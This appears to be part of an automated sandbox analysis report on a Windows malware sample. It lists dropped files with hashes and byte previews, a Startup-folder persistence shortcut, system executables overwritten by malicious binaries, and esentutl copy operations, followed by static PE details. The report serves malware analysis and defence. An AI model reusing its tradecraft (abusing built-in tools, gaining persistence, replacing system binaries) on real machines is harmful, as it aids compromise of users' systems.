                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zymrtecj.rom.ps1

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\605af54964cdb3b4.bin

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.986248430480442
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:oMY8gNsUCq5S66/dreB4TiOEIXyybayT0KZBnocpG:bY8gWxyS66/dro4TO0GeBnocpG
                                                                                                                                                                                                                                                                                                                                                    MD5:653A6A05C49487D7220447F1680FD655
                                                                                                                                                                                                                                                                                                                                                    SHA1:E560713DE45215EB3180F50C474AA4723AA27056
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FEFFB945031332189C9B15E83D746D701A8AEDFC8C91DC07C08BC16A025C5EAB
                                                                                                                                                                                                                                                                                                                                                    SHA-512:DA144C60309DF4DCAF11D73EC41B0DE93132B4042575607E8F13DE02D19E32674C4DF3A6040B00001A2751909CEBCF6CD8607DA6FC15FB3DA5CB31E05BAC0AA1
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:. .....M]....nD.ZD.6...'.....w.B...-|..v....Y}.....r..c.{..?......C...x.jA....M._:.."A^..q1)f?......H..%X.I(...I..I......w...V....F.+.?Q,sP.u....t...XJ.......?...............F.|?7.^.[.f.|tpG~......R......!.<]z...:....<%....\.....r...I....Z{..~....g....a.'..4....Q...b`..{ZJ......9.Q!.ZnV'9..E..r..^Ui@.!oA.....h....f...W.D.:~..J....u.....>....F....L..5..3\....E.:....@..'....o.:.G...%H. +..]\\......=6*.............#J.|..i.T.|h.*o..h..nP.M../...Q..M.=7..5...... ..^D.dx!;.,3.......uv..o...l~X.m.....y,...oc#j|N...!_.gH.R...~.;.x.E25.wA....6..lp...4X........T...!.....*....y..e....O.............{....._.....&d.^..c@~...^........&....^Yr.....c...).D1....K.n.Y..-.>r^.03.)|...{c.e..X ,]r7........!.W...q..?....q.f..K`..V[t.......e...6Pdg..}..y.{.j.......*U`.p.....T._c"...C..46......0..3.#..=.(.O.z%5M.a<3a.]s.......M.i..m... ..%..._.:.ETc.v.`.*.p.....#....?n.+U3.`^8../D......Pd^Tm.\.[..;......8&..!..K7.&B..B.pTc...1...XF.....M..W.3\....../7N.....&.J.

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):665670656
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999999322396024
                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                                                                                                                                    MD5:A89798786670C9BBB806311854859FF3
                                                                                                                                                                                                                                                                                                                                                    SHA1:EB70FB0007B6C59BCF5ED287AFCE580EC00EAF80
                                                                                                                                                                                                                                                                                                                                                    SHA-256:D3A0F32738261ADC57F76BE1605CE1BE9D5684BA039EA34398A48CA364E4D9C7
                                                                                                                                                                                                                                                                                                                                                    SHA-512:62C49C0888D52569EB6F7CE6F8E1A109168D8FCF36673988D13785EDE0E3F541CF0BE483B7B9240DDBE9F9F0B35B108AB34B471201E24D2FEDBDDE7A4120C326
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Nov 26 06:12:25 2024, mtime=Tue Nov 26 06:12:25 2024, atime=Tue Nov 26 06:12:25 2024, length=70656, window=
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1772
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5027084517548843
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:8fvm9DnSeiUcDzbAvoFG9l6R+O4ZvPqRB+0w0Tm:8nm9DpheQQo6R+ZXqRkFU
                                                                                                                                                                                                                                                                                                                                                    MD5:A41B9F43D88401725E34D3299FB39364
                                                                                                                                                                                                                                                                                                                                                    SHA1:13EFFB0EC310501CA0FC81AE928AC0B7BAEDEBE7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:40686D20E5A21D2578F155F01864EA1ACAA09F324638E3D4F8C2BD97A6D57BEA
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D274BA3D82EB56F0B1D6F07B21C55B430ED05D3A98F9792ABBB5A49F0F5833A3DF6E93CEC8F4B2CC89B08B4D351C8577F66FD39DEB2250C16A99EA8F9FED4E40
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:L..................F.@.. .......?......?......?............................:..DG..Yr?.D..U..k0.&...&.........5q....x.{.?..*...?......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)NzY.9...........................c..A.p.p.D.a.t.a...B.V.1.....zY.9..Roaming.@......EW)NzY.9...........................n..R.o.a.m.i.n.g.....T.1.....zY.9..ACCApi..>......zY.9zY.9....A.....................E.-.A.C.C.A.p.i.....b.2.....zY.9 .apihost.exe.H......zY.9zY.9....B.....................w...a.p.i.h.o.s.t...e.x.e......._...............-.......^...........I.Z`.....C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.2.C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...............................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\AppVClient.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.253758937779228
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:CQW4qoNUgslKNX0Ip0MgHCpoMBOuhsqjnhMgeiCl7G0nehbGZpbD:CQW9BKNX0IPgiKMBOu1Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:907DB1B5C7DE81B95CC62375B2502582
                                                                                                                                                                                                                                                                                                                                                    SHA1:248091D3AE8CDC05AB48E6A576529B014934B656
                                                                                                                                                                                                                                                                                                                                                    SHA-256:FD10440B3F8565AC791862DC5A31D116D1BB454A9A350435D6EAB881C81E5AD5
                                                                                                                                                                                                                                                                                                                                                    SHA-512:61BF867E85C045D8D71BCF6C03CA01A73EAD0CEF22F83F960ED066C9942206BD8F361C2A9F424F819E6BF6845AE62DD9BD4A52FA2BB09ED792969A683A939270
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@....................................Nz.... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163565147363484
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:X2G7AbHjkSsqjnhMgeiCl7G0nehbGZpbD:X2G7AbHjXDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:0A64A4ED4EB3C629A98F377037B6EC4E
                                                                                                                                                                                                                                                                                                                                                    SHA1:7F60B62D4169F4FD6BD7631CC2C0AC5135C2C514
                                                                                                                                                                                                                                                                                                                                                    SHA-256:C49D25BA7DC658D225C9686ED2CD4B2F5D5096C0B8CCF66B420EFD8F824D90C9
                                                                                                                                                                                                                                                                                                                                                    SHA-512:301056D14BF179D244928D2B4D1E6F6BCD89E2B34A4FFF5AD8762829487812C2CA06E9ABAA20B2BEE4EF4396A2259F4D27E047ED6C635FDACDAB844EF849B640
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B6l0.W.c.W.c.W.c./.cPW.c.<.b.W.c.<.b.W.c.W.c.S.c.<.b.W.c.<.b.W.c.<.b.W.c.<.c.W.c.<.c.W.c.<.b.W.cRich.W.c................PE..d...^.Jw.........."............................@......................................... .......... ......................................p?...................................... #..T...................8...(... ...............`...H............................text............................... ..`.rdata...b.......d..................@..@.data...@....p.......P..............@....pdata...............T..............@..@.rsrc................b..............@..@.reloc...P.......@...n..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\FXSSVC.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.28896258780016
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:gkdpSI+K3S/GWei+qNv2uG36sqjnhMgeiCl7G0nehbGZpbD:g6SIGGWei2uG3ODmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:BB9DE1AD24CC587EB4D9FB9CF61AE13B
                                                                                                                                                                                                                                                                                                                                                    SHA1:B5513F9D17E5728481C555C9AA08CB5B3DA78DF7
                                                                                                                                                                                                                                                                                                                                                    SHA-256:3485FB788C57C77ACBAD6537F2CE2CA75FD94DF78A7B9918A79720193B7E3028
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B1EE98851B97E85F70B06A6E58F0AA719C0F4A70CF798772E3B8F6225EB9A5B9878134876A72C44AD238F5056856D38A54AE2EC22D37129D2F65D5F8898B23ED
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}x..}x..}x...{..}x...|..}x...y..}x..}y.x|x...p..}x...}..}x......}x...z..}x.Rich.}x.................PE..d................."...... .....................@.............................P......F}.... ..................................................{..h....P...........1......................T...........................pk...............l.......{..@....................text...Y........ .................. ..`.rdata..2u...0...v...$..............@..@.data... H.......<..................@....pdata...1.......2..................@..@.didat.......@......................@....rsrc........P......................@..@.reloc.......`......................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\alg.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1225728
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1633259316778375
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:LEP3R6LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Q6LsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:E471E4037B76A28D3D82E42538FC3807
                                                                                                                                                                                                                                                                                                                                                    SHA1:0D9C2B6AEF2DEAC247F85587827630E425F71DFA
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6E23959A1A5C16CC7178AF0B9C52FEA6F73A5C11FDD661AE140774E057C8233A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:B35DF6254C602CB843AF9328AD71EDB38D6EB31DF3A94529BC384AE960CFD4DDB5A3E75E64AA60900A495970AD4D3158F5CABFE62C280F808D3DAFA9E4AEFBE6
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.......................................... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...P.......@...t..............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Windows\System32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12320
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.98364637414295
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:YFeJuDbsvYPU4LlBHBj1j+4Gl3tfqkszEKf2QXCNUOgJ:YFRsQPUCBHTj+4Gl9ns1LggJ
                                                                                                                                                                                                                                                                                                                                                    MD5:A055973748358743BD8C06CF92051938
                                                                                                                                                                                                                                                                                                                                                    SHA1:F9E3C80F71DD7C7556A004ABB00E2344A8DC5639
                                                                                                                                                                                                                                                                                                                                                    SHA-256:475CB30999E6B9AEE2FFED8139CB9626751973138335A871A71131B0F2D527B6
                                                                                                                                                                                                                                                                                                                                                    SHA-512:A6A58479BAD8EA0C1494C444DFCBA5EE0DFAEED7224E47BA89144B981ACD1D7007FF3C288DDBEE290C55D5E65344935159239A21B0D74D319ECE9D183E80B43A
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:....~..~7....c..>.R..&...:PX.Sf3.y.q.a....O"8n.2...[I..~.v. .... /.#...L .V5>..1.!..[.-.^q.U...y.u............3A6dV.49...:I7.?...h.....|..;..Y......L.<.Q...}.SM0.......8m. v..n..G.X.Z.l..F:.r.t...;.........3L..:.%.#/...n.&..s .s.Xy....a..\.K.Z...;..w../.QpbA.....Z.v.=..O..e~ZA..2.=. ....2..7J-..$B...M.$...J.R.. ....x.L.C..q7Qc~#..n..".U.U.wl.E....I.:.O..f..Hq.E...|..<..AW....7...t..c.;..(.D.&...A...g.B...f_...|K.p..{.%V..'W....n...6........)y...Y...~/g......N....bSD.h.t..<.!:.|.rU3.Y..(.-...T...4....9..Z.$fG..Q...5.@.2.",...A0n..:...<^..U....|....M#..|.....64.)Q..aF...J.U.N.....]=.`.j.F1R.g;....A..@#..`I...:U...{...r......[..|..B.od.R.....e..[s,...h.x6@.ug..N.P....<oJE4FU&....=S.#......XRn.n.U.q..M..v.O.>.0..T...G..l.)...nG........%.rt.d-bK..brp..p....,...C...l.....O......A.<..uZ...N(Q#..-.|.n....T.n.._,....'E.=....N.+....../..-k....(...}..7.....7.$......`. .....tIv^.$....RB.. .S..r.....!.l...He....w......7<...%.v.."=..).K&{....)"...I.I\9.....ZF$

                                                                                                                                                                                                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):589
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.653524581215269
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:qftxTzmBzeSbZ7u0wxDDDDDDDDjCaY5Da3laYAV/TB8NGNgL:GtxTzkzp7u0wQakDa1aT/t8NN
                                                                                                                                                                                                                                                                                                                                                    MD5:6C238F155BC10840242D1292443665E6
                                                                                                                                                                                                                                                                                                                                                    SHA1:0AF69C1B8527760742A66E2AABF97B2458C79B16
                                                                                                                                                                                                                                                                                                                                                    SHA-256:05012D9A97E2F251395B193C6CDE3DDE542E29A3B85049823437DC3D48A0703A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA5163FFA63C5DEE3A8FA6B9D338ECF48AB196B6BDE0001EF75C298A849CD0C0060EC5921A545B20CC80E5857B38B8CB1E609CE7BC1D6A2A09CB91B0ABF20EB2
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\C6dAUcOA6M.exe...Destination File: C:\\Users\\Public\\Libraries\\Juqmtmya.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12b800 (1226752) (1 MB)....Total bytes written = 0x12c000 (1228800) (1 MB).......Operation completed successfully in 0.141 seconds.....

                                                                                                                                                                                                                                                                                                                                                    \Device\Null

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):560
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.531408806270406
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNu:/p4xT5cp7u0wQakB4aV4t8N/
                                                                                                                                                                                                                                                                                                                                                    MD5:3AAD6503854EEE988A985FDB8AEA2D0A
                                                                                                                                                                                                                                                                                                                                                    SHA1:6A05F4A808955462A3B892E140082E6996F61602
                                                                                                                                                                                                                                                                                                                                                    SHA-256:13AED35D56E59B0160FDD47AB845B9F0E12EDF5CE70EE125BC7C5F9CA306BEB3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:4B03346B75E7EEC6196184415E4D84F1B33215E954C9B8DCE3807141C981A759F3E3B91A7F36CE2DE821C2005172FD4AE6C999431C668A73E72DA0916688EA42
                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.46 seconds.....

                                                                                                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.458699684550258
                                                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                                                                                                                                                                                                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                                                    File name:C6dAUcOA6M.exe
                                                                                                                                                                                                                                                                                                                                                    File size:1'226'752 bytes
                                                                                                                                                                                                                                                                                                                                                    MD5:53f0663219e6091cecd600c59389711f
                                                                                                                                                                                                                                                                                                                                                    SHA1:f1986a61c2cb0107444fbd3e8075a25e21fb26ca
                                                                                                                                                                                                                                                                                                                                                    SHA256:0161d30defee14b9bdac49068c63a344320c11330acdfc10952c025637684adb
                                                                                                                                                                                                                                                                                                                                                    SHA512:9d466680cc90f57ada29495e32592084ec6daf37cdc53f2776a720d66f0284b09c619a25c9ede8e73e91b8c20d2a7ab5dfee0504ba7454389ce842afd27962a1
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:KdKnJlmwhG7vohKM4br2gza6HR2zlPQxL/F99UljJes8lSnQ:KCl70YOLSes8lSQ
                                                                                                                                                                                                                                                                                                                                                    TLSH:55456AE5E4A1F4F3F0115571DA0F939A6A577D233665A643AFD23E0A0EB464C2C0AFC2
                                                                                                                                                                                                                                                                                                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                                                                                                                    Icon Hash:353541e45ce40145

                                                                                                                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                                                                                    Entrypoint:0x45e754
                                                                                                                                                                                                                                                                                                                                                    Entrypoint Section:.itext
                                                                                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                                                                                                                                                    DLL Characteristics:
                                                                                                                                                                                                                                                                                                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                    Import Hash:d3cc1904f8cbf58ea5e134fbf8956c7a

                                                                                                                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                                                                                                                                                    add esp, FFFFFFF0h
                                                                                                                                                                                                                                                                                                                                                    mov eax, 0045CE30h
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE901A0E5h
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [0046998Ch]
                                                                                                                                                                                                                                                                                                                                                    mov eax, dword ptr [eax]
                                                                                                                                                                                                                                                                                                                                                    call 00007F5EE9067105h
